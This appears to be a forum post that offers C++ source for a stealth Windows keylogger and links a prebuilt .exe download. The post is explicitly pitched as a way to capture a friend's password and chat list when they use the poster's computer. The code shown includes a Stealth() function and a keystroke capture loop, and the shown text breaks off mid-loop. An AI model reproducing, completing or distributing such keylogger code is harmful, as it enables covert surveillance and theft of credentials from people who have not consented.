The Following Code Captures All The Key Strokes Of your keyBoard
NOTE: I am not responsible for any misuse of code
So when Your Friend Logged In Your System,His password or chating list will be captured...
1. Code:
If u Dont know c or c++.. You can simply download .exe file from here http://www.mediafire.com/?wyi9r6kh3k9hktx
and Move to Step 2
#include <iostream>
using namespace std;
#include <windows.h>
#include <winuser.h>
int Save (int key_stroke, char *file);
void Stealth();
int main()
{
Stealth();
int I;
while (1)
{
for (I...
